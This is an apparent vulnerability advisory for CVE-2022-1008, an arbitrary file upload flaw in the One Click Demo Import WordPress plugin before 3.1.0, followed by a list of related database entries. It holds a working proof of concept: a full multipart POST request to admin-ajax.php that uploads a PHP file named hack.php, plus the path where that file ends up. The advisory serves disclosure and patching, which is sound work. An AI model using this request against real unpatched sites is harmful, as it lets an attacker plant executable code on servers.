Lucene search
YICHENG LIU-ZTE CHENFENG lab WPEX-ID:0C2E2B4D-49EB-4FD9-B9F0-3FEAE80C1082HistoryMar 21, 2022 - 12:00 a.m.
One Click Demo Import < 3.1.0 - Admin+ Arbitrary File Upload
2022-03-2100:00:00
YICHENG LIU-ZTE CHENFENG lab
70
0.001 Low
EPSS
Percentile
41.2%
The plugin does not validate the imported file, allowing high privilege users such as admin to upload arbitrary files (such as PHP) even when FILE_MODS and FILE_EDIT are disallowed
Access Tools > Import > One Click Demo Import > Run Importer and import dummy XML file (can be empty)
Intercept the request made and change the filename as well as content:
POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------18228892847416541933274753306
Content-Length: 507
Connection: close
Cookie: [admin+]
-----------------------------18228892847416541933274753306
Content-Disposition: form-data; name="action"
ocdi_upload_manual_import_files
-----------------------------18228892847416541933274753306
Content-Disposition: form-data; name="security"
e35089cb91
-----------------------------18228892847416541933274753306
Content-Disposition: form-data; name="content_file"; filename="hack.php"
Content-Type: text/xml
<?php phpinfo();?>
-----------------------------18228892847416541933274753306--
The file will be at https://example.com/wp-content/uploads/<year>/<month>/hack.phpRelated
openvas
openvas
patchstack
patchstack
cvelist
cvelist
CVE-2022-1008 One Click Demo Import < 3.1.0 - Admin+ Arbitrary File Upload
2022-04-11 14:41:07
nvd
nvd
CVE-2022-1008
2022-04-11 15:15:09
cve
cve
CVE-2022-1008
2022-04-11 15:15:09
wpvulndb
wpvulndb
One Click Demo Import < 3.1.0 - Admin+ Arbitrary File Upload
2022-03-21 00:00:00
prion
prion
Design/Logic Flaw
2022-04-11 15:15:00